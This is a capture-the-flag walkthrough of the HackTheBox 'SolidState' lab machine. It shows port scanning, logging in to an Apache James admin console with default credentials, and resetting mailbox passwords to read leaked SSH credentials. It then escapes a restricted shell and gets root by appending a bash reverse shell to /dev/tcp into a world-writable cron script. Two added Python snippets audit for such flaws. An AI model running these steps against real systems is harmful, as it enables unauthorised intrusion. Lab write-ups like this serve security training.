---
title: HackTheBox-SolidState
author: CrazyInSide
layout: true
categories: HackTheBox
cover: https://www.worldisend.com/img/SolidState.png
tags:
  - Linux
---
```
CrazyInSide:~/HackTheBox$ sudo masscan -p1-65535,U:1-65535 --rate 2000 -e tun0 10.10.10.51
[sudo] crazyinside 的密码:
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-08-30 06:04:41 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 4555/tcp on 10.10.10.51
Discovered open port 22/tcp on 10.10.10.51
Discovered open port 110/tcp on 10.10.10.51
Discovered open port 25/tcp on 10.10.10.51
Discovered open port 119/tcp on 10.10.10.51
Discovered open port 80/tcp on 10.10.10.51

CrazyInSide:~/HackTheBox$ cat SolidState
# Nmap 7.92SVN scan initiated Tue Aug 30 14:08:28 2022 as: nmap -sC -sV -p4555,22,110,25,119,80 -oN SolidState 10.10.10.51
Nmap scan report for 10.10.10.51
Host is up (0.16s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
|   2048 770084f578b9c7d354cf712e0d526d8b (RSA)
|   256 78b83af660190691f553921d3f48ed53 (ECDSA)
|_  256 e445e9ed074d7369435a12709dc4af76 (ED25519)
25/tcp   open  smtp    JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.16.4 [10.10.16.4])
80/tcp   open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Home - Solid State Security
|_http-server-header: Apache/2.4.25 (Debian)
110/tcp  open  pop3    JAMES pop3d 2.3.2
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
119/tcp  open  nntp    JAMES nntpd (posting ok)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
4555/tcp open  rsip?
| fingerprint-strings:
|   GenericLines:
|     JAMES Remote Administration Tool 2.3.2
|     Please enter your login and password
|     Login id:
|     Password:
|     Login failed for
|_    Login id:
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://ParrotOS.org/cgi-bin/submit.cgi?new-service :
SF-Port4555-TCP:V=7.92SVN%I=7%D=8/30%Time=630DA969%P=x86_64-unknown-linux-
SF:gnu%r(GenericLines,7C,"JAMES\x20Remote\x20Administration\x20Tool\x202\.
SF:3\.2\nPlease\x20enter\x20your\x20login\x20and\x20password\nLogin\x20id:
SF:\nPassword:\nLogin\x20failed\x20for\x20\nLogin\x20id:\n");
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://ParrotOS.org/submit/ .
# Nmap done at Tue Aug 30 14:12:35 2022 -- 1 IP address (1 host up) scanned in 246.92 seconds
```
The application running on port 25:
```
CrazyInSide:~/HackTheBox$ searchsploit JAMES
------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                       |  Path
------------------------------------------------------------------------------------- ---------------------------------
Apache James Server 2.2 - SMTP Denial of Service                                     | multiple/dos/27915.pl
Apache James Server 2.3.2 - Insecure User Creation Arbitrary File Write (Metasploit) | linux/remote/48130.rb
Apache James Server 2.3.2 - Remote Command Execution                                 | linux/remote/35513.py
Apache James Server 2.3.2 - Remote Command Execution (RCE) (Authenticated) (2)       | linux/remote/50347.py
WheresJames Webcam Publisher Beta 2.0.0014 - Remote Buffer Overflow                  | windows/remote/944.c
------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
------------------------------------------------------------------------------------- ---------------------------------
 Paper Title                                                                         |  Path
------------------------------------------------------------------------------------- ---------------------------------
Exploiting Apache James Server 2.3.2                                                 | docs/english/40123-exploiting-ap
------------------------------------------------------------------------------------- ---------------------------------
```
```
msf6 > search Apache James

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  exploit/linux/smtp/apache_james_exec      2015-10-01       normal  Yes    Apache James Server 2.3.2 Insecure User Creation Arbitrary File Write
   1  auxiliary/scanner/http/log4shell_scanner  2021-12-09       normal  No     Log4Shell HTTP Scanner


Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/http/log4shell_scanner

msf6 > use 0
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/smtp/apache_james_exec) > show options

Module options (exploit/linux/smtp/apache_james_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   ADMINPORT  4555             yes       Port for James remote administration tool
   PASSWORD   root             yes       Root password for James remote administration tool
   POP3PORT   110              no        Port for POP3 Apache James Service
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      25               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   root             yes       Root username for James remote administration tool

Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.3      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   1   Cron

msf6 exploit(linux/smtp/apache_james_exec) >
```
The port numbers all match, but the username and password might not.
```
msf6 exploit(linux/smtp/apache_james_exec) > run

[*] Started reverse TCP handler on 10.10.16.4:4444
[*] 10.10.10.51:25 - Command Stager progress - 100.00% done (833/833 bytes)
[*] 10.10.10.51:25 - Waiting for cron to execute payload...
[*] Exploit completed, but no session was created.
msf6 exploit(linux/smtp/apache_james_exec) >
```
It indeed does not work.
Visiting port 4555 from the browser automatically submitted some of my browser's HTTP headers as input data.
```
CrazyInSide:~/HackTheBox$ nc 10.10.10.51 4555
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
help
Currently implemented commands:
help                                    display this help
listusers                               display existing accounts
countusers                              display the number of existing accounts
adduser [username] [password]           add a new user
verify [username]                       verify if specified user exist
deluser [username]                      delete existing user
setpassword [username] [password]       sets a user's password
setalias [user] [alias]                 locally forwards all email for 'user' to 'alias'
showalias [username]                    shows a user's current email alias
unsetalias [user]                       unsets an alias for 'user'
setforwarding [username] [emailaddress] forwards a user's email to another email address
showforwarding [username]               shows a user's current email forwarding
unsetforwarding [username]              removes a forward
user [repositoryname]                   change to another user repository
shutdown                                kills the current JVM (convenient when James is run as a daemon)
quit                                    close connection
```
root:root clearly works, so why didn't it succeed? I can enumerate the usernames:
```
listusers
Existing accounts 6
user: james
user: ../../../../../../../../etc/bash_completion.d
user: thomas
user: john
user: mindy
user: mailadmin
```
I reset all the passwords; why the second username is a path, I don't know either:
```
setpassword james crazyinside
Password for james reset
setpassword thomas crazyinside
Password for thomas reset
setpassword john crazyinside
Password for john reset
setpassword mindy crazyinside
Password for mindy reset
setpassword mailadmin crazyinside
Password for mailadmin reset
```
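The second account in the `listusers` output above is a relative path. As an added illustration (not part of the original writeup), the check below shows where a mailbox directory ends up when such a name is joined onto a per-user repository root without validation, and the allow-list a mail admin tool should apply before `adduser`. The repository root path is an assumption, not the real James layout.

```python
import posixpath
import re

# Constructed sample: the account names `listusers` returned on this box.
LISTED_USERS = [
    "james",
    "../../../../../../../../etc/bash_completion.d",
    "thomas", "john", "mindy", "mailadmin",
]

# Assumed (hypothetical) per-user mailbox root; the real James layout is not on the page.
REPO_ROOT = "/opt/james-2.3.2/apps/james/var/mail/inboxes"

# Allow-list a mail admin tool should enforce before `adduser`:
# no '/' or '\', no leading dot, bounded length.
SAFE_USERNAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")


def naive_inbox_dir(username, root=REPO_ROOT):
    """Join the username onto the repository root with no validation,
    then canonicalize, to show where the mailbox really lands."""
    return posixpath.normpath(posixpath.join(root, username))


def escapes_root(username, root=REPO_ROOT):
    """True when the canonical mailbox path is no longer under the root."""
    root = posixpath.normpath(root)
    return posixpath.commonpath([root, naive_inbox_dir(username, root)]) != root


def is_valid_username(username):
    """The check that would have rejected the traversal account above."""
    return SAFE_USERNAME.match(username) is not None


def audit_users(users=LISTED_USERS):
    """Map each account to (canonical mailbox path, escapes root?, passes allow-list?)."""
    return {u: (naive_inbox_dir(u), escapes_root(u), is_valid_username(u)) for u in users}


if __name__ == "__main__":
    for user, (path, escaped, ok) in audit_users().items():
        print("%-48s -> %s  escapes=%s  valid=%s" % (user, path, escaped, ok))
```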
Mindy's mailbox holds two emails, one of which contains a username and password:
```
CrazyInSide:~/HackTheBox$ telnet 10.10.10.51 110
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER mindy
+OK
PASS crazyinside
+OK Welcome mindy
LIST
+OK 2 1945
1 1109
2 836
.
RETR 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: mailadmin@localhost
Subject: Welcome

Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.

We are looking forward to you joining our team and your success at Solid State Security.

Respectfully,
James
.
RETR 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,

Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.

username: mindy
pass: P@55W0rd1!2@

Respectfully,
James
.
```
These can be used to log in over SSH, but the shell is restricted:
```
Message-ID: <8375593.0.1661772097524.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: ../../../../../../../../etc/bash_completion.d@localhost
Received: from 10.10.14.18 ([10.10.14.18])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 632
          for <../../../../../../../../etc/bash_completion.d@localhost>;
          Mon, 29 Aug 2022 07:20:57 -0400 (EDT)
Date: Mon, 29 Aug 2022 07:20:57 -0400 (EDT)
From: team@team.pl: No such file or directory
-rbash: $'\r': command not found
mindy@solidstate:~$
```
Easy to bypass:
```
CrazyInSide:~/HackTheBox$ sshpass -p 'P@55W0rd1!2@' ssh mindy@10.10.10.51 -t bash
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ls
bin  user.txt
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ id
uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cat user.txt
839631b6a847fb2415f9764adb415a7b
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$
```
Under /opt/ there is a scheduled-task script that root runs periodically:
```
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ ls
james-2.3.2  tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
     os.system('nc 10.10.14.18 4242')
except:
     sys.exit()
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ ls -all tmp.py
-rwxrwxrwx 1 root root 111 Aug 29 09:35 tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$
```
And the script is world-writable:
```
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ echo "os.system('bash -c \"bash -i >& /dev/tcp/10.10.16.4/1337 0>&1\"')">>tmp.py
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
     os.system('nc 10.10.14.18 4242')
except:
     sys.exit()
os.system('bash -c "bash -i >& /dev/tcp/10.10.16.4/1337 0>&1"')
```
```
CrazyInSide:~/HackTheBox$ nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.16.4] from (UNKNOWN) [10.10.10.51] 57460
bash: cannot set terminal process group (6567): Inappropriate ioctl for device
bash: no job control in this shell
root@solidstate:~# ls
ls
root.txt
root@solidstate:~# cat root.txt
cat root.txt
ad68d5.............................
root@solidstate:~#
```
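The root path here is a root-owned cron script with mode -rwxrwxrwx. As an added defensive check (not from the original writeup), the audit below parses /etc/crontab-style lines, stats every absolute path in each command, and reports scripts that group or others can modify, plus scripts whose parent directory permits swapping the file. The crontab lines are constructed; the box's real crontab is not shown on the page.

```python
import os
import stat
import tempfile


def parse_system_crontab(line):
    """Parse one /etc/crontab-style line (5 time fields, user, command).
    Returns (user, command), or None for blank, comment and VAR=value lines."""
    line = line.strip()
    if not line or line.startswith("#") or "=" in line.split()[0]:
        return None
    fields = line.split(None, 6)
    return (fields[5], fields[6]) if len(fields) == 7 else None


def writable_by_non_owner(path):
    """Group or other write bits: the -rwxrwxrwx case of /opt/tmp.py."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_cron_lines(lines):
    """Flag every existing absolute path in a cron command that a non-owner
    can modify, and any whose parent directory allows replacing the file."""
    findings = []
    for line in lines:
        parsed = parse_system_crontab(line)
        if parsed is None:
            continue
        user, command = parsed
        for token in command.split():
            if not token.startswith("/") or not os.path.isfile(token):
                continue
            if writable_by_non_owner(token):
                findings.append((user, token, "script writable by group/others"))
            if writable_by_non_owner(os.path.dirname(token)):
                findings.append((user, token, "parent dir writable by group/others"))
    return findings


def build_demo():
    """Constructed sample: a root job running a 0777 script (like tmp.py here)
    next to one running a 0755 script; returns the weak path and the findings."""
    d = tempfile.mkdtemp()  # created 0700, so the parent-dir check stays quiet
    weak, good = os.path.join(d, "tmp.py"), os.path.join(d, "ok.py")
    for path, mode in ((weak, 0o777), (good, 0o755)):
        with open(path, "w") as f:
            f.write("#!/usr/bin/env python\n")
        os.chmod(path, mode)
    crontab = ["# constructed /etc/crontab excerpt", "PATH=/usr/bin:/bin",
               "*/3 * * * * root python %s" % weak,
               "*/3 * * * * root python %s" % good]
    return weak, audit_cron_lines(crontab)
```

Run against a real /etc/crontab and /etc/cron.d/* the same function works line by line; per-user crontabs lack the user field and need the owner supplied instead.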